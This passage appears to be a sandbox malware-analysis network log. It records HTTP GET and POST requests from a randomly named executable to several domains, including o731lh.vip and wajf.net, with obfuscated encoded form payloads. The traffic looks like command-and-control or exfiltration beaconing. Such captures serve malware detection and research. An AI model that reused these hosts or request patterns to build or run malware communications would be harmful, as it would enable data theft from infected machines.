                                  Sep 16, 2024 09:32:24.541198015 CEST1236INData Raw: 61 31 65 0d 0a 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22
                                  Data Ascii: a1eUTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><script type="text/javascript">window.flatStyles = window.flatStyles || ''window.lightspeedOptimizeStylesheet = function () {const currentSt
                                  Sep 16, 2024 09:32:24.541234016 CEST1236INData Raw: 73 65 74 41 74 74 72 69 62 75 74 65 28 20 27 64 61 74 61 2d 6c 73 2d 6f 70 74 69 6d 69 7a 65 64 27 2c 20 27 31 27 20 29 0a 0a 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 66 6c 61 74 53 74 79 6c 65 73 20 2b 3d 20 63 75 72 72 65 6e 74 53 74 79
                                  Data Ascii: setAttribute( 'data-ls-optimized', '1' )window.flatStyles += currentStylesheet.innerHTMLthis.optimizing = false}} else {window.flatStyles = currentStylesheet.innerHTMLcurrentStylesheet.s
                                  Sep 16, 2024 09:32:24.541269064 CEST125INData Raw: 65 6d 65 6e 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 74 61 67 4e 61 6d 65 20 21 3d 3d 20 27 48 45 41 44 27 20 29 20 7b 0a 09 09 09 09 09 09 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 20 73 74 79 6c 65 53 68 65 65 74 45
                                  Data Ascii: ement.parentElement.tagName !== 'HEAD' ) {document.head.append( styleSheetElement )}}}</script>
                                  Sep 16, 2024 09:32:24.559808969 CEST1236INData Raw: 31 66 34 30 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 69 64 3d 22 74 63 62 2d 73 74 79 6c 65 2d 62 61 73 65 2d 74 68 72 69 76 65 5f 74 65 6d 70 6c 61 74 65 2d 32 31 39 22 20 20 6f 6e 4c 6f 61 64 3d 22 74 79 70 65
                                  Data Ascii: 1f40<style type="text/css" id="tcb-style-base-thrive_template-219" onLoad="typeof window.lightspeedOptimizeStylesheet === 'function' && window.lightspeedOptimizeStylesheet()" class="tcb-lightspeed-style">.thrv_widget_menu{position:relative;
                                  Sep 16, 2024 09:32:24.559875011 CEST1236INData Raw: 2d 69 74 65 6d 2d 64 72 6f 70 64 6f 77 6e 2d 74 72 69 67 67 65 72 3a 6e 6f 74 28 3a 65 6d 70 74 79 29 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 7d 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 2d 77
                                  Data Ascii: -item-dropdown-trigger:not(:empty){margin-left:8px;}.tve-m-trigger{display:none;-webkit-tap-highlight-color:transparent;}.tve-m-trigger:focus,.tve-m-trigger:active{outline:none;}.tve-m-trigger .thrv_icon{font-size:33px;width:33px;height:33px;m
                                  Sep 16, 2024 09:32:24.559925079 CEST448INData Raw: 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 69 6e 68
                                  Data Ascii: apper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li{background-color:inherit;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu ul{display:none;position:relative;width:100%;left:0px;top:0px;}.thrv_wi
                                  Sep 16, 2024 09:32:24.559957981 CEST1236INData Raw: 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72
                                  Data Ascii: ;margin-left:0px !important;margin-right:0px !important;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"] ul.tve_w_menu li:not(#increase-spec):not(.ccls):focus,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-
                                  Sep 16, 2024 09:32:24.559988976 CEST1236INData Raw: 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 5b 63 6c 61 73 73 2a 3d 22 64 61 72 6b 2d 74 6d 70 22 5d 20 75 6c 2e 74 76 65 5f 77
                                  Data Ascii: nu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="dark-tmp"] ul.tve_w_menu li .sub-menu li{background-color:rgb(41,41,42);}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"][class*="dark-tmp"] ul.tve_w_menu li >
                                  Sep 16, 2024 09:32:24.560020924 CEST1236INData Raw: 63 69 74 79 3a 30 3b 7d 2e 74 68 72 76 5f 77 69 64 67 65 74 5f 6d 65 6e 75 2e 74 68 72 76 5f 77 72 61 70 70 65 72 5b 63 6c 61 73 73 2a 3d 22 74 76 65 2d 63 75 73 74 6f 6d 2d 6d 65 6e 75 2d 73 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d
                                  Data Ascii: city:0;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dropdown .tve-m-trigger.tve-triggered-icon .tcb-icon-close{opacity:1;}.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-dro
                                  Sep 16, 2024 09:32:24.560055017 CEST1236INData Raw: 77 69 74 63 68 2d 69 63 6f 6e 2d 22 5d 2e 74 76 65 2d 6d 6f 62 69 6c 65 2d 73 69 64 65 2d 72 69 67 68 74 20 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75 3a 3a 2d 77 65 62 6b 69 74 2d 73 63 72 6f 6c 6c 62 61 72 2d 74 72 61 63 6b 2c 2e 74 68 72 76 5f 77
                                  Data Ascii: witch-icon-"].tve-mobile-side-right ul.tve_w_menu::-webkit-scrollbar-track,.thrv_widget_menu.thrv_wrapper[class*="tve-custom-menu-switch-icon-"].tve-mobile-side-left ul.tve_w_menu::-webkit-scrollbar-track,.thrv_widget_menu.thrv_wrapper[class*=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.45584144.213.25.70805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:25.868325949 CEST515OUTGET /72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk= HTTP/1.1
                                  Host: www.newdaydawning.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:27.014731884 CEST477INHTTP/1.1 301 Moved Permanently
                                  Date: Mon, 16 Sep 2024 07:32:26 GMT
                                  Server: Apache
                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                  X-Redirect-By: WordPress
                                  Location: http://newdaydawning.net/72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk=
                                  Connection: close
                                  Transfer-Encoding: chunked
                                  Content-Type: text/html; charset=UTF-8
                                  Sep 16, 2024 09:32:27.034292936 CEST5INData Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.4558423.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:40.161334038 CEST765OUTPOST /2mtz/ HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.o731lh.vip
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.o731lh.vip/2mtz/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 46 64 77 53 44 6f 33 6f 30 55 35 58 74 32 70 44 42 49 44 74 66 6b 75 74 73 4c 2f 73 35 4f 4e 75 42 61 6a 66 4a 7a 46 67 52 53 4b 51 34 71 43 4e 54 78 71 55 53 64 7a 65 68 43 6e 46 4d 36 78 48 46 62 47 56 39 2b 47 62 65 53 4f 38 78 30 4a 41 70 43 75 6b 4f 50 49 78 39 52 39 74 4a 7a 78 76 4a 55 6a 69 36 76 38 6a 48 55 6c 70 39 56 55 44 53 44 4a 75 42 48 52 33 64 47 48 32 4b 6f 4c 38 63 64 46 6c 51 4d 4c 41 73 50 43 32 2b 61 58 54 35 43 65 61 41 6f 4b 68 76 37 48 49 59 55 6e 6a 43 67 51 4c 6f 4b 37 36 6d 69 34 37 46 72 74 4e 75 57 31 53 65 51 42 30 65 61 53 4b 49 77 74 6b 44 67 3d 3d
                                  Data Ascii: h2Pt9=FdwSDo3o0U5Xt2pDBIDtfkutsL/s5ONuBajfJzFgRSKQ4qCNTxqUSdzehCnFM6xHFbGV9+GbeSO8x0JApCukOPIx9R9tJzxvJUji6v8jHUlp9VUDSDJuBHR3dGH2KoL8cdFlQMLAsPC2+aXT5CeaAoKhv7HIYUnjCgQLoK76mi47FrtNuW1SeQB0eaSKIwtkDg==


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.4558433.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:42.702240944 CEST785OUTPOST /2mtz/ HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.o731lh.vip
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 222
                                  Referer: http://www.o731lh.vip/2mtz/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 46 64 77 53 44 6f 33 6f 30 55 35 58 75 58 5a 44 41 72 37 74 61 45 75 69 67 72 2f 73 32 75 4d 6e 42 61 76 66 4a 33 55 74 51 68 2b 51 35 4c 79 4e 53 79 79 55 66 39 7a 65 35 53 6e 45 52 71 78 4d 46 62 43 64 39 38 53 62 65 53 61 38 78 31 35 41 6f 78 32 6e 4f 66 49 33 32 78 39 6a 45 54 78 76 4a 55 6a 69 36 76 35 45 48 55 39 70 39 45 45 44 55 6d 39 78 66 33 52 32 61 47 48 32 4f 6f 4c 34 63 64 46 4c 51 4f 2f 71 73 4d 36 32 2b 66 54 54 35 54 65 46 4b 6f 4b 6e 68 62 47 34 55 6c 2b 4e 43 54 70 47 76 37 65 64 74 68 77 49 45 74 38 58 2f 6e 55 46 4d 51 6c 48 44 64 62 2b 46 7a 51 74 59 6c 39 30 39 70 76 69 57 5a 2f 65 31 45 43 5a 37 5a 50 74 4f 71 41 3d
                                  Data Ascii: h2Pt9=FdwSDo3o0U5XuXZDAr7taEuigr/s2uMnBavfJ3UtQh+Q5LyNSyyUf9ze5SnERqxMFbCd98SbeSa8x15Aox2nOfI32x9jETxvJUji6v5EHU9p9EEDUm9xf3R2aGH2OoL4cdFLQO/qsM62+fTT5TeFKoKnhbG4Ul+NCTpGv7edthwIEt8X/nUFMQlHDdb+FzQtYl909pviWZ/e1ECZ7ZPtOqA=


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.4558443.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:45.251543999 CEST10867OUTPOST /2mtz/ HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.o731lh.vip
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 10302
                                  Referer: http://www.o731lh.vip/2mtz/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 46 64 77 53 44 6f 33 6f 30 55 35 58 75 58 5a 44 41 72 37 74 61 45 75 69 67 72 2f 73 32 75 4d 6e 42 61 76 66 4a 33 55 74 51 68 6d 51 34 39 4f 4e 53 53 4f 55 65 39 7a 65 31 79 6e 2f 52 71 78 52 46 61 6d 5a 39 38 50 67 65 52 69 38 77 54 74 41 35 30 43 6e 41 66 49 33 35 52 39 75 4a 7a 78 41 4a 55 7a 6d 36 73 52 45 48 55 39 70 39 48 4d 44 44 6a 4a 78 64 33 52 33 64 47 48 78 4b 6f 4c 41 63 64 74 39 51 4e 54 51 73 63 61 32 2f 2f 44 54 36 68 32 46 47 6f 4b 6c 73 37 47 67 55 6c 43 4f 43 54 31 67 76 37 72 36 74 6d 77 49 48 6f 38 49 6b 57 49 79 57 68 46 67 59 36 7a 59 47 43 30 75 58 56 45 52 36 35 48 48 4f 4b 54 52 74 48 66 6f 2f 6f 66 6c 58 39 2f 75 56 68 4c 72 37 72 2b 4d 62 67 49 48 48 45 46 38 4c 69 74 5a 52 51 32 4b 58 74 6c 76 39 52 34 67 37 52 58 72 73 6d 53 46 57 70 79 39 50 50 4c 46 4a 37 49 58 36 52 4e 33 74 44 35 76 4c 69 42 6e 64 70 6b 2b 31 59 59 67 72 50 45 42 49 77 74 64 6b 6c 33 65 63 63 7a 64 32 6b 4e 6d 6c 61 70 42 45 6a 42 6c 31 55 64 61 32 67 72 32 6b 61 6e 72 4d 6f 50 78 [TRUNCATED]
                                  Data Ascii: h2Pt9=FdwSDo3o0U5XuXZDAr7taEuigr/s2uMnBavfJ3UtQhmQ49ONSSOUe9ze1yn/RqxRFamZ98PgeRi8wTtA50CnAfI35R9uJzxAJUzm6sREHU9p9HMDDjJxd3R3dGHxKoLAcdt9QNTQsca2//DT6h2FGoKls7GgUlCOCT1gv7r6tmwIHo8IkWIyWhFgY6zYGC0uXVER65HHOKTRtHfo/oflX9/uVhLr7r+MbgIHHEF8LitZRQ2KXtlv9R4g7RXrsmSFWpy9PPLFJ7IX6RN3tD5vLiBndpk+1YYgrPEBIwtdkl3ecczd2kNmlapBEjBl1Uda2gr2kanrMoPxSoFtQeGwnIerSPPpfJsNZogixuvhDnGNvk6lnt/4HLvwVyMuhrNwr1FpASEOJZqFjyiRyxMnrFES+K9DRQCgOJMYaSU+sJPDftoLSgzo2dBEx+I7zKfw1ZEkFdkB/2EMKMmrYJBXNRivFp744rAsA6kwEmpy5SUcMslhK4rSSvxY1JNGxexWKyzamKI8Tl7IIF3+dUnK5CxegdtwNsLGfpvx0TxpXUAVyHve26+VopY8kF1YzUNzlBlhP9CduhmqV8SQauWimLlCtfOR3izYUKFaLlwvEKSVMcvBtsXkWfVqQonrRO6MoPD+QNdiZjk8g1qNUKUyAv3AwOGJQ7zUhoC7H5QhKmCFroTk+CLZiktuXq61n+Vyx6twmbzIjWxsy36xk0+KqLM+B0rCNDAz/AQEh9JeyL+fedLVXBjfMEcaOjPsW8Wptzi98mcHL30s1RYoNfDuuMvC9qwwhKK+lIFZClOcWUUymBC9eY0rwq92LPj1P1egLd0WJNbpgaNnl0JXPAaCzUFW8bD6/1+RWaMWXJMu4Kx55ZUuiPLtLhPSjz5YBZ9/Gi0g13oulOmO/+EJV4bv4Q4R2f6gWBOdTLpg+NfzNzF+jkAFb30FvoBC0XlHsxutdDfWXgOyOa2SrG6gVmlBAAsK42LpI9G3VZHXz6YZ403tjy [TRUNCATED]


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.4558453.33.130.190805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:47.811455011 CEST508OUTGET /2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= HTTP/1.1
                                  Host: www.o731lh.vip
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Connection: close
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Sep 16, 2024 09:32:48.271414995 CEST396INHTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 16 Sep 2024 07:32:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 256
                                  Connection: close
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 52 4c 68 73 3d 37 42 4a 4c 4d 34 65 48 26 68 32 50 74 39 3d 49 66 59 79 41 64 47 56 71 47 31 35 2b 57 31 65 57 4a 43 78 53 30 4f 52 74 34 6e 75 36 49 59 31 44 36 32 42 64 42 41 6c 55 67 2b 33 34 34 65 4d 4e 43 7a 4a 4c 66 79 35 6a 77 7a 6e 47 4a 68 70 4e 73 2f 50 39 73 69 79 5a 53 53 34 78 6b 39 74 76 78 4b 35 65 65 38 70 34 68 4a 61 47 44 39 4c 66 6c 7a 43 78 2f 51 62 45 6e 4e 72 74 33 30 65 56 67 52 63 65 47 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0="}</script></head></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.45584654.81.206.248805964C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe
                                  TimestampBytes transferredDirectionData
                                  Sep 16, 2024 09:32:53.551100969 CEST759OUTPOST /zl4r/ HTTP/1.1
                                  Host: www.wajf.net
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                  Accept-Language: en-us
                                  Accept-Encoding: gzip, deflate
                                  Origin: http://www.wajf.net
                                  Content-Type: application/x-www-form-urlencoded
                                  Connection: close
                                  Cache-Control: no-cache
                                  Content-Length: 202
                                  Referer: http://www.wajf.net/zl4r/
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
                                  Data Raw: 68 32 50 74 39 3d 6e 43 61 54 77 75 7a 66 63 54 2b 31 6a 51 49 41 57 62 5a 4c 4c 64 64 6e 32 39 4c 32 36 4b 6f 63 4b 44 65 63 56 6d 64 63 76 39 6e 75 44 57 32 56 55 51 72 65 75 75 68 74 57 46 4a 4a 4b 45 35 2f 48 74 6f 72 4e 6e 4a 72 4a 59 66 79 77 55 41 62 4b 6b 41 52 65 58 53 43 47 72 41 48 55 6f 44 75 4f 4e 56 6d 4a 6d 4a 33 79 6a 67 6a 33 6b 46 68 4b 48 67 37 65 78 50 4f 41 41 64 43 57 6d 6a 4b 57 33 72 55 38 43 65 6d 57 48 50 76 68 6e 77 78 35 44 75 38 47 46 6d 68 45 46 38 79 6b 43 79 36 61 47 73 59 44 78 78 6d 37 48 66 78 38 31 65 2f 6b 50 44 70 66 62 35 4c 63 31 4a 6b 62 4b 7a 74 79 77 3d 3d
                                  Data Ascii: h2Pt9=nCaTwuzfcT+1jQIAWbZLLddn29L26KocKDecVmdcv9nuDW2VUQreuuhtWFJJKE5/HtorNnJrJYfywUAbKkAReXSCGrAHUoDuONVmJmJ3yjgj3kFhKHg7exPOAAdCWmjKW3rU8CemWHPvhnwx5Du8GFmhEF8ykCy6aGsYDxxm7Hfx81e/kPDpfb5Lc1JkbKztyw==
                                  Sep 16, 2024 09:32:54.009495974 CEST1236INHTTP/1.1 200 OK
                                  Date: Mon, 16 Sep 2024 07:32:53 GMT
                                  Content-Type: text/html; charset=utf-8
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Data Raw: 33 31 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
                                  Data Ascii: 3151<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
                                  Sep 16, 2024 09:32:54.009573936 CEST1236INData Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                  Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
                                  Sep 16, 2024 09:32:54.009608984 CEST448INData Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
                                  Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
                                  Sep 16, 2024 09:32:54.009644032 CEST1236INData Raw: 20 31 37 37 2e 39 35 39 32 34 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 4e 61 6d 65 42 72 69 67 68 74 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 20 2e 63 6c 73 2d 31 20 7b 20 66 69 6c 6c 3a 20 76 61 72 28 2d 2d 73 74 6c 72 2d 63 6f 6c 6f 72 5f
                                  Data Ascii: 177.95924" aria-label="NameBright"><defs><style> .cls-1 { fill: var(--stlr-color__copy); } .cls-2 { fill: var(--stlr-color__copy); } </style></defs><title id="nb-title">NameBright</title><path d="M389.99266,151.2143c-11.28447,0-19.78113-.6964
                                  Sep 16, 2024 09:32:54.009676933 CEST1236INData Raw: 38 35 2e 30 35 30 30 37 2c 34 37 39 2e 30 32 33 32 37 2c 38 36 2e 30 32 32 37 35 2c 34 37 35 2e 38 31 36 35 38 2c 38 36 2e 30 32 32 37 35 5a 6d 33 30 2e 39 33 30 37 2d 32 34 2e 39 33 31 34 39 68 2d 31 33 2e 35 31 30 34 61 32 2e 39 31 39 30 37 2c
                                  Data Ascii: 85.05007,479.02327,86.02275,475.81658,86.02275Zm30.9307-24.93149h-13.5104a2.91907,2.91907,0,0,1-2.92745-2.78781V46.04462a2.91715,2.91715,0,0,1,2.92745-2.78444h13.5104a2.79471,2.79471,0,0,1,2.78647,2.78444V58.30345A2.79673,2.79673,0,0,1,506.747
                                  Sep 16, 2024 09:32:54.009711981 CEST1236INData Raw: 2d 31 32 2e 38 31 34 61 32 2e 39 32 31 32 2c 32 2e 39 32 31 32 2c 30 2c 30 2c 31 2d 32 2e 37 38 36 34 35 2d 32 2e 39 32 37 37 38 56 39 39 2e 38 31 34 31 63 30 2d 39 2e 36 31 32 33 33 2d 34 2e 30 34 31 31 2d 31 33 2e 39 32 39 36 33 2d 31 34 2e 32
                                  Data Ascii: -12.814a2.9212,2.9212,0,0,1-2.78645-2.92778V99.8141c0-9.61233-4.0411-13.92963-14.21025-13.92963a58.85927,58.85927,0,0,0-13.37247,1.2536v60.03481a2.91881,2.91881,0,0,1-2.78613,2.92778h-12.814a2.91837,2.91837,0,0,1-2.7831-2.92778V46.881a2.79213,
                                  Sep 16, 2024 09:32:54.009744883 CEST1236INData Raw: 3e 3c 70 61 74 68 20 64 3d 22 4d 35 34 33 2e 37 39 39 33 32 2c 32 33 2e 37 33 35 34 31 6c 32 2e 38 36 38 35 36 2c 34 2e 39 37 31 61 31 2e 33 30 35 2c 31 2e 33 30 35 2c 30 2c 30 2c 31 2d 2e 35 31 32 37 35 2c 31 2e 37 33 33 30 36 4c 35 32 33 2e 39
